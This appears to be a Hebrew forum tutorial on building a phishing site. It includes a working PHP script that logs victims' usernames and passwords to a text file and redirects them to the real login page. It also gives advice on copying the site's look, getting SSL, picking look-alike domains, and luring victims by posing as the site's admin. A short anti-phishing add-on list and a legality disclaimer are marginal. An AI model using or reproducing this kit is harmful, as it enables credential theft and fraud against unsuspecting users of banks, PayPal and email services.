Phishing
אז מה זה בעצם Phishing?
פישינג זה בעצם אתר שמתחזה לאתר אחר, בדר"כ בשביל לגנוב סיסמאות לחשבונות של אנשים.
לדוגמא: עשיתי דף פישינג ל-Gmail שדומה ל-Gmail כמו שתי טיפות מים, בכל פעם שיזינו את פרטי החשבון שלהם באתר שעשיתי הססמאות + ה-E-mail שלהם יכתבו לתוך קובץ טקסט.
שימו לב שלעשות אתר פישינג זה מעשה לא חוקי ועלול להכניס אותכם להרבה צרות.
השם "phishing" בא מהמילה "fishing" (לדוג), כי מה שאתה בעצם עושה באתר פישינג זה "לדוג" את הסיסמאות של "הקורבנות".
אתרים שכיחים שעושים להם אתרי פישינג הם: אתרי בנקים, אתרים כמו Paypal\Alertpay ואתרים שהחשבונות של המשתמשים שלהם יכולים להיות מאוד שימושיים.
ואיך בדיוק אני יוצר אתר Phishing?
דווקא ליצור אתרי פישניג זה מאוד פשוט.
- המדריך דורש ידע בסיסי בPHP ובHTML.
(לצורך הדגמה ניצור דף פישינג לאתר ,"example" אין כזה באמת אתר...O_o.)
היצירה
ניכנס לאתר www.example.com\login.php ונעתיק את קוד המקור שלו לקובץ טקסט.
מי שלא יודע איך לראות את קוד מקור של אתרים אז יכולים לעשות את זה כך:
בIE:
קליק ימיני --> הצג מקור דף
במקום להעתיק את הקוד מקור אפשר לעשות File > ללחוץ על Save As > לבחור באפשרות השמירה Web Page Complete ולשמור.
עכשיו פתחו אתר חדש באיזהשהוא איכסון (שבמקרה הזה תומך בPHP) עם אותו שם (example) ופתחו באתר דף בשם login.php,, הדביקו את קוד המקור של הדף www.example.com\login.php באותו דף שלכם, ותשמרו את הדף.
תיכנסו לדף שעשיתם, הוא נראה בידיוק כמו ?www.example.com\login.php
אם כן, אתם יכולים לדלג על השורות הבאות.
אם לא - אתם צריכים לוודא מה לא נראה בדף שעשיתם כמו בדף www.example.com\login.php.
האם זה קוד ה-CSS או אולי תמונה שלא עובדת במקרה בדף שלכם?
הפתרון לזה הוא ברוב המקרים פשוט להסתכל בקוד המקור של www.example.com\login.php, אם אתם רואים שהדף לדוגמא מייבא את ה CSS ככה:
קוד:
קוד:
<style type="text/css">
@import url("/css.css");
</style>
או
קוד:
קוד:
<style rel="sylesheet" type="text/css" href="/css.css>
</style>
אז למה הCSS לא עובד בדף שלכם?
התשובה היא בגלל שהאתר מייבא את קובץ ה-CSS מ- css.css/
מה שאומר שאם הקובץ css.css לא נמצא באותו אכסון שלך ובאותה Dir, אז הוא לא ייבא שום CSS.
איך פותרים?
הכי פשוט זה לכתוב בדף שלכם במקום:
קוד:
קוד:
<style rel="sylesheet" type="text/css" href="/css.css>
</style>
ככה:
קוד:
קוד:
<style rel="sylesheet" type="text/css" href="www.example.com/css.css>
</style>
וככה גם לתמונות וכ'ו.
עכשיו אנחנו צריכים למצוא את השמות (ID, Name) של התיבות טקסט\סיסמא.
איך מוצאים?
מחפשים בקוד המקור של הדף את התגים של תיבת טקסט (Input), וכשמגיעים לתיבת טקסט המבוקשת רואים מה השם שלה
ורושמים אותו בצד. (ככה לעשות גם לתיבת הסיסמא)
נניח ושם תיבת הטקסט של שם-המשתמש היא
A
ונניח ושם תיבת הסיסמא היא
B
נניח ומצאנו אותו וזה הaction שלו:
קוד HTML:
<form action="enter.php"
כעת ניצור עוד דף באתרנו בשם enter.php.
וגם נעלה לשרת קובץ טקסט בשם passwords.txt.
ובעצם נכתוב בדף enter.php סקריפט שיכתוב את הפרטים שהמשתמש הזין - לקובץ passwords.txt, ואז יעביר את המשתמש ל-www.example.com\login.php. (האתר האמיתי)
הסקריפט יראה כך:
קוד PHP:
קוד PHP:
<?php
$AAA = fopen("/passwords.txt", "a");
$User = $_REQUEST['A'];
$Pass = $_REQUEST['B'];
fwrite($AAA, "User-name: ");
fwrite($AAA, $User);
fwrite($AAA, "\n");
fwrite($AAA, "Password: ");
fwrite($AAA, $Pass);
fwrite($AAA, "\n");
fclose($AAA);
header('Location: www.example.com\login.php');
?>
עכשיו תנסו להזין פרטים לדף הפישינג שלכם ותראו אם הכל עובד כמתוכנן, אם לא - תחזרו אחורה ותנסו למצוא דברים לא נכונים שעשיתם במהלך יצרית האתר.
אמון
נניח והכל עובד טוב והאתר שלכם יכול כבר לגנוב פרטים, הגיעה השאלה של האמון.
אם משתמש יראה שמשהו באתר שלכם הוא לא כמו באתר האמיתי הוא עלול לעזוב את האתר שלכם ואף יותר גרוע - לדווח על האתר!
אז מה שאנחנו צריכים לעשות הוא לדאוג שהאתר שלכם יראה בידיוק כמו האתר שאתם עושים לו אתר פישינג - איך עושים את זה? תמשיכו לקרוא.
SSL
אם האתר שאתם עושים לו אתר פישינג משתמש בSSL, הרי זה מעלה חשדות שבאתר האמיתי יש SSL ובאתר שלכם אין.
מה עושים?
קונים הסמכת SSL או שמקבלים אחד בחינם מאתר כמו:
http://cert.startcom.org/
URL
אתם חייבים שלאתר שלכם יהיה שם דומה לאתר האמיתי.
בגלל זה במדריך פתחנו במדריך הזה אתר בשם www.example.hosting.com.
אבל זה לא מספיק אמין, אתם צריכים אתר עם Domain!
איך פותרים?
או שקונים מהאכסון שלכם חבילה יותר מתקדמת ומקבלים דומיין או "שמסווים" את הURL של האתר שלכם בעזרת אתר שנותן לך לעשות זאת, כמו:
http://co.cc
http://www. freedomain . co . nr/
http://ovh.co.yk
http:// dot . tk
Favicon
יש לאתר שאתם רוצים לעשות לו אתר פישינג Favicon?
אז זה לא בעיה שלאתר שלך יהיה אותו Favicon.
אם בקוד המקור שהעתקנו במדריך - יש כבר Favicon, אז אתם לא צריכים לדאוג לסעיף הזה.
אם אין, תנסו לחפש בגוגל את הFavicon של האתר שאתם רוצים לעשות לו אתר פישינג או שתחפשו בקוד המקור של הדף הראשי של האתר שאתם רוצים לעשות לו אתר פישינג ולחפש שם את הלינק לFavicon שלהם.
Ads
רוב האכסונים החינמיים ישימו לכם מודעות משלהם באתר, זה לא טוב לכם... בכלל לא! למה?
אני יתן לכם לחשוב לבד למה זה לא טוב... [IMG]http://www.***.co.il/images/smilies2/ninja.gif[/IMG]
איך פותרים?
קונים חבילת האכסון מתקדמת יותר - בלי מודעות, או - יש אכסונים שאפשר לעקוף את קוד המודעות שלהם בעורמה (לדוגמה: T35)
איך לפרסם את אתר הפישינג שלי?
תרשמו את אתרכם למנועי חיפוש, תשלחו הודעות לאנשים כשאתם מתחזים לAdmin של האתר האמיתי ותאמרו שהם צריכים להתחבר מסיבה כלשהיא...
יש הרבה דרכים.
איך לא נופלים בפח של אתרי Phishing?
יש כמעט לכל דפדפן מסנן אתרי-פישינג מובנה.
יש גם תוספות לפיירפוקס כמו:
FirePhish Anti-Phishing Extension
Storage Inspector
Netcraft Toolbar
Petname Tool
PhishTank SiteChecker
FirePhish Anti-Phishing Extension
שינסו לסנן אתרי פישינג.
תמיד תיהיו זהירים לא ללחוץ על לינקים "לאתרי בנק וכ'ו" שאנשים שולחים לכם.
קרדיט ענק לskyangelxd
[דיון]Phishing
נכתב במקור על ידי אושרי
